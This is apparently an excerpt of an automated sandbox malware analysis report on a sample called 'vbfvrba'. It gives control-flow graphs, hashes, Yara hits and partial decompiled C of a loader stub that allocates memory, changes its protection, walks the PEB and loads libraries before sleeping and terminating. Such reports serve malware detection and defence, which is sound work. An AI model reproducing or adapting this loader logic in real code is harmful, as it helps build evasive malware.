                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 0000000B.00000002.376349644.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_400000_vbfvrba.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                        • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                        • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                        • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 6e003c-6e0047 1 6e004c-6e0263 call 6e0a3f call 6e0e0f call 6e0d90 VirtualAlloc 0->1 2 6e0049 0->2 17 6e028b-6e0292 1->17 18 6e0265-6e0289 call 6e0a69 1->18 2->1 19 6e02a1-6e02b0 17->19 21 6e02ce-6e03c2 VirtualProtect call 6e0cce call 6e0ce7 18->21 19->21 22 6e02b2-6e02cc 19->22 29 6e03d1-6e03e0 21->29 22->19 30 6e0439-6e04b8 VirtualFree 29->30 31 6e03e2-6e0437 call 6e0ce7 29->31 33 6e04be-6e04cd 30->33 34 6e05f4-6e05fe 30->34 31->29 35 6e04d3-6e04dd 33->35 36 6e077f-6e0789 34->36 37 6e0604-6e060d 34->37 35->34 39 6e04e3-6e0505 35->39 40 6e078b-6e07a3 36->40 41 6e07a6-6e07b0 36->41 37->36 42 6e0613-6e0637 37->42 51 6e0517-6e0520 39->51 52 6e0507-6e0515 39->52 40->41 44 6e086e-6e08be LoadLibraryA 41->44 45 6e07b6-6e07cb 41->45 46 6e063e-6e0648 42->46 50 6e08c7-6e08f9 44->50 48 6e07d2-6e07d5 45->48 46->36 49 6e064e-6e065a 46->49 53 6e07d7-6e07e0 48->53 54 6e0824-6e0833 48->54 49->36 55 6e0660-6e066a 49->55 56 6e08fb-6e0901 50->56 57 6e0902-6e091d 50->57 58 6e0526-6e0547 51->58 52->58 59 6e07e4-6e0822 53->59 60 6e07e2 53->60 62 6e0839-6e083c 54->62 61 6e067a-6e0689 55->61 56->57 63 6e054d-6e0550 58->63 59->48 60->54 64 6e068f-6e06b2 61->64 65 6e0750-6e077a 61->65 62->44 66 6e083e-6e0847 62->66 68 6e0556-6e056b 63->68 69 6e05e0-6e05ef 63->69 70 6e06ef-6e06fc 64->70 71 6e06b4-6e06ed 64->71 65->46 72 6e084b-6e086c 66->72 73 6e0849 66->73 74 6e056f-6e057a 68->74 75 6e056d 68->75 69->35 76 6e06fe-6e0748 70->76 77 6e074b 70->77 71->70 72->62 73->44 79 6e057c-6e0599 74->79 80 6e059b-6e05bb 74->80 75->69 76->77 77->61 84 6e05bd-6e05db 79->84 80->84 84->63
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006E024D
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.376837614.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_6e0000_vbfvrba.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: cess$kernel32.dll
                        • API String ID: 4275171209-1230238691
                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                        • Instruction ID: 0e35a6c12bade70b1b465d455dd422e68b4f7a7e37c090aa8174b37a3a36a116
                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                        • Instruction Fuzzy Hash: 12527874A01269DFDB64CF59C984BA8BBB1BF09304F1480D9E90DAB351DB70AE85DF14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 185 6e0e0f-6e0e24 SetErrorMode * 2 186 6e0e2b-6e0e2c 185->186 187 6e0e26 185->187 187->186
                        APIs
                        • SetErrorMode.KERNELBASE(00000400,?,?,006E0223,?,?), ref: 006E0E19
                        • SetErrorMode.KERNELBASE(00000000,?,?,006E0223,?,?), ref: 006E0E1E
                        Memory Dump Source
                        • Source File: 0000000B.00000002.376837614.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_6e0000_vbfvrba.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                        • Instruction ID: 5910df1618b4d58ae791dba76823746767ea92d9917d6bbb5d2ec6216bae3b2e
                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                        • Instruction Fuzzy Hash: 4AD0123114522877D7002A95DC09BCD7B1CDF05B62F008421FB0DD9180C7B0994046E5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:8.9%
                        Dynamic/Decrypted Code Coverage:53.4%
                        Signature Coverage:0%
                        Total number of Nodes:103
                        Total number of Limit Nodes:8
                        execution_graph 2316 402ad1 2317 402ad2 2316->2317 2319 402b56 2317->2319 2320 40180c 2317->2320 2321 40181b 2320->2321 2322 40183e Sleep 2321->2322 2324 401859 2322->2324 2323 40186a NtTerminateProcess 2325 401876 2323->2325 2324->2323 2325->2319 2326 40b675 2327 40b73f __freea 2326->2327 2328 40b6b5 ___convertcp 2326->2328 2328->2327 2330 4091b3 2328->2330 2332 4091bc 2330->2332 2333 4091f9 2332->2333 2334 40a71a 2332->2334 2333->2327 2337 40a726 __calloc_impl 2334->2337 2335 40a7cf RtlAllocateHeap 2335->2337 2336 40a73e 2336->2332 2337->2335 2337->2336 2338 5a003c 2339 5a0049 2338->2339 2351 5a0e0f SetErrorMode SetErrorMode 2339->2351 2344 5a0265 2345 5a02ce VirtualProtect 2344->2345 2347 5a030b 2345->2347 2346 5a0439 VirtualFree 2350 5a04be LoadLibraryA 2346->2350 2347->2346 2349 5a08c7 2350->2349 2352 5a0223 2351->2352 2353 5a0d90 2352->2353 2354 5a0dad 2353->2354 2355 5a0dbb GetPEB 2354->2355 2356 5a0238 VirtualAlloc 2354->2356 2355->2356 2356->2344 2357 401818 2358 40181b 2357->2358 2359 40183e Sleep 2358->2359 2361 401859 2359->2361 2360 40186a NtTerminateProcess 2362 401876 2360->2362 2361->2360 2415 4096ba 2417 4096e1 2415->2417 2422 4097a0 2417->2422 2423 40aee0 2417->2423 2421 40b315 ___crtLCMapStringA RtlAllocateHeap 2421->2422 2424 40aef3 _LocaleUpdate::_LocaleUpdate 2423->2424 2431 40ad26 2424->2431 2426 40975b 2427 40b315 2426->2427 2428 40b328 _LocaleUpdate::_LocaleUpdate 2427->2428 2460 40af70 2428->2460 2430 40977b 2430->2421 2432 40ad47 2431->2432 2436 40ad5f __freea ___convertcp 2432->2436 2437 40b62c 2432->2437 2436->2426 2438 40b656 2437->2438 2439 40ae7d 2438->2439 2445 40a704 2438->2445 2439->2436 2441 40b675 2439->2441 2442 40b73f __freea 2441->2442 2443 40b6b5 ___convertcp 2441->2443 2442->2436 2443->2442 2444 4091b3 __calloc_crt RtlAllocateHeap 2443->2444 2444->2442 2448 40b592 2445->2448 2449 40b5ab 2448->2449 2452 40b363 2449->2452 2454 40b378 _LocaleUpdate::_LocaleUpdate 2452->2454 2453 40a715 2453->2439 2454->2453 2456 40b829 2454->2456 2458 40b83d __isleadbyte_l _LocaleUpdate::_LocaleUpdate 2456->2458 2457 40b84a 2457->2454 2458->2457 2459 40aee0 ___crtGetStringTypeA RtlAllocateHeap 2458->2459 2459->2457 2461 40af91 2460->2461 2462 40b62c ___ansicp RtlAllocateHeap 2461->2462 2466 40b006 __freea ___convertcp 2461->2466 2463 40b1d2 2462->2463 2464 40b675 ___convertcp RtlAllocateHeap 2463->2464 2463->2466 2465 40b1fd ___convertcp 2464->2465 2465->2466 2467 40b675 ___convertcp RtlAllocateHeap 2465->2467 2466->2430 2467->2466 2363 5a0001 2364 5a0005 2363->2364 2369 5a092b GetPEB 2364->2369 2366 5a0030 2371 5a003c 2366->2371 2370 5a0972 2369->2370 2370->2366 2372 5a0049 2371->2372 2373 5a0e0f 2 API calls 2372->2373 2374 5a0223 2373->2374 2375 5a0d90 GetPEB 2374->2375 2376 5a0238 VirtualAlloc 2375->2376 2377 5a0265 2376->2377 2378 5a02ce VirtualProtect 2377->2378 2380 5a030b 2378->2380 2379 5a0439 VirtualFree 2383 5a04be LoadLibraryA 2379->2383 2380->2379 2382 5a08c7 2383->2382 2411 402a9d 2413 402ad2 2411->2413 2412 402b56 2413->2412 2414 40180c 2 API calls 2413->2414 2414->2412 2384 5a0005 2385 5a092b GetPEB 2384->2385 2386 5a0030 2385->2386 2387 5a003c 7 API calls 2386->2387 2388 5a0038 2387->2388

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 85 40180c-40185b call 401140 Sleep call 401381 96 40186a-401870 NtTerminateProcess 85->96 97 40185d-401865 call 401455 85->97 98 40187f 96->98 97->96 100 401882-4018a2 call 401140 98->100 101 401876-40187b 98->101 101->100
                        C-Code - Quality: 23%
                        			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                        				char _v8;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				void* _t11;
                        				void* _t16;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t20;
                        				void* _t21;
                        
                        				_t22 = __eflags;
                        				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                        				_t17 = _a4;
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                        				if(_t11 != 0) {
                        					_push(_a16);
                        					_push(_v8);
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, _t20); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				return __eax;
                        			}














                        0x0040180c
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 0000000E.00000002.458314855.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_vbfvrba.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                        • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                        • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                        • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 107 401818-40185b call 401140 Sleep call 401381 117 40186a-40187f NtTerminateProcess 107->117 118 40185d-401865 call 401455 107->118 121 401882-4018a2 call 401140 117->121 122 401876-40187b 117->122 118->117 122->121
                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 0000000E.00000002.458314855.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_vbfvrba.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                        • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                        • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                        • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 128 401822-40185b call 401140 Sleep call 401381 139 40186a-40187f NtTerminateProcess 128->139 140 40185d-401865 call 401455 128->140 143 401882-4018a2 call 401140 139->143 144 401876-40187b 139->144 140->139 144->143
                        C-Code - Quality: 17%
                        			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t11;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t22;
                        
                        				_t23 = __eflags;
                        				asm("out 0x95, eax");
                        				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t17 =  *((intOrPtr*)(_t22 + 8));
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                        				if(_t11 != 0) {
                        					_push( *((intOrPtr*)(_t22 + 0x14)));
                        					_push( *((intOrPtr*)(_t22 - 4)));
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, __edi); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}







                        0x00401822
                        0x00401822
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 0000000E.00000002.458314855.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_vbfvrba.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                        • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                        • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                        • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 150 401826-40185b call 401140 Sleep call 401381 157 40186a-40187f NtTerminateProcess 150->157 158 40185d-401865 call 401455 150->158 161 401882-4018a2 call 401140 157->161 162 401876-40187b 157->162 158->157 162->161
                        C-Code - Quality: 17%
                        			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t8;
                        				void* _t11;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t22;
                        
                        				_t23 = __eflags;
                        				asm("sbb ebx, ebp");
                        				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t17 =  *((intOrPtr*)(_t22 + 8));
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                        				if(_t11 != 0) {
                        					_push( *((intOrPtr*)(_t22 + 0x14)));
                        					_push( *((intOrPtr*)(_t22 - 4)));
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, __edi); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}








                        0x00401826
                        0x00401826
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 0000000E.00000002.458314855.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_vbfvrba.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                        • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                        • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                        • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 168 401834-40185b call 401140 Sleep call 401381 174 40186a-40187f NtTerminateProcess 168->174 175 40185d-401865 call 401455 168->175 178 401882-4018a2 call 401140 174->178 179 401876-40187b 174->179 175->174 179->178
                        C-Code - Quality: 20%
                        			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t10;
                        				void* _t13;
                        				intOrPtr* _t19;
                        				void* _t22;
                        				void* _t25;
                        
                        				_t26 = __eflags;
                        				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t19 =  *((intOrPtr*)(_t25 + 8));
                        				Sleep(0x1388);
                        				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                        				if(_t13 != 0) {
                        					_push( *((intOrPtr*)(_t25 + 0x14)));
                        					_push( *((intOrPtr*)(_t25 - 4)));
                        					_push(_t13);
                        					_push(_t19); // executed
                        					L00401455(0x60, _t22, __edi); // executed
                        				}
                        				 *_t19(0xffffffff, 0); // executed
                        				_t19 = _t19 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}








                        0x00401834
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 0000000E.00000002.458314855.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_400000_vbfvrba.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                        • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                        • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                        • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 5a003c-5a0047 1 5a0049 0->1 2 5a004c-5a0263 call 5a0a3f call 5a0e0f call 5a0d90 VirtualAlloc 0->2 1->2 17 5a028b-5a0292 2->17 18 5a0265-5a0289 call 5a0a69 2->18 20 5a02a1-5a02b0 17->20 22 5a02ce-5a03c2 VirtualProtect call 5a0cce call 5a0ce7 18->22 20->22 23 5a02b2-5a02cc 20->23 29 5a03d1-5a03e0 22->29 23->20 30 5a0439-5a04b8 VirtualFree 29->30 31 5a03e2-5a0437 call 5a0ce7 29->31 33 5a04be-5a04cd 30->33 34 5a05f4-5a05fe 30->34 31->29 36 5a04d3-5a04dd 33->36 37 5a077f-5a0789 34->37 38 5a0604-5a060d 34->38 36->34 40 5a04e3-5a0505 36->40 41 5a078b-5a07a3 37->41 42 5a07a6-5a07b0 37->42 38->37 43 5a0613-5a0637 38->43 52 5a0517-5a0520 40->52 53 5a0507-5a0515 40->53 41->42 44 5a086e-5a08be LoadLibraryA 42->44 45 5a07b6-5a07cb 42->45 46 5a063e-5a0648 43->46 51 5a08c7-5a08f9 44->51 48 5a07d2-5a07d5 45->48 46->37 49 5a064e-5a065a 46->49 54 5a07d7-5a07e0 48->54 55 5a0824-5a0833 48->55 49->37 50 5a0660-5a066a 49->50 56 5a067a-5a0689 50->56 58 5a08fb-5a0901 51->58 59 5a0902-5a091d 51->59 60 5a0526-5a0547 52->60 53->60 61 5a07e2 54->61 62 5a07e4-5a0822 54->62 57 5a0839-5a083c 55->57 63 5a068f-5a06b2 56->63 64 5a0750-5a077a 56->64 57->44 65 5a083e-5a0847 57->65 58->59 66 5a054d-5a0550 60->66 61->55 62->48 69 5a06ef-5a06fc 63->69 70 5a06b4-5a06ed 63->70 64->46 71 5a084b-5a086c 65->71 72 5a0849 65->72 67 5a05e0-5a05ef 66->67 68 5a0556-5a056b 66->68 67->36 74 5a056f-5a057a 68->74 75 5a056d 68->75 76 5a074b 69->76 77 5a06fe-5a0748 69->77 70->69 71->57 72->44 78 5a059b-5a05bb 74->78 79 5a057c-5a0599 74->79 75->67 76->56 77->76 84 5a05bd-5a05db 78->84 79->84 84->66
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005A024D
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.458435299.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_5a0000_vbfvrba.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: cess$kernel32.dll
                        • API String ID: 4275171209-1230238691
                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                        • Instruction ID: 339b6381adfffe255570805e1953e9d3465a61c11f423d1475d0b3c283b03e5d
                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                        • Instruction Fuzzy Hash: 3B526874A11229DFDB64CF58C984BACBBB1BF09304F1480D9E94DAB291DB30AE95DF14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 185 5a0e0f-5a0e24 SetErrorMode * 2 186 5a0e2b-5a0e2c 185->186 187 5a0e26 185->187 187->186
                        APIs
                        • SetErrorMode.KERNELBASE(00000400,?,?,005A0223,?,?), ref: 005A0E19
                        • SetErrorMode.KERNELBASE(00000000,?,?,005A0223,?,?), ref: 005A0E1E
                        Memory Dump Source
                        • Source File: 0000000E.00000002.458435299.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_5a0000_vbfvrba.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                        • Instruction ID: ce7575169f36a7c85206fcae42e0fcb861aa2e687c756cbd9285e154151780ed
                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                        • Instruction Fuzzy Hash: 18D0123114512877DB002A94DC09BCD7F1CDF09B62F008411FB0DD9080C770994046E5
                        Uniqueness

                        Uniqueness Score: -1.00%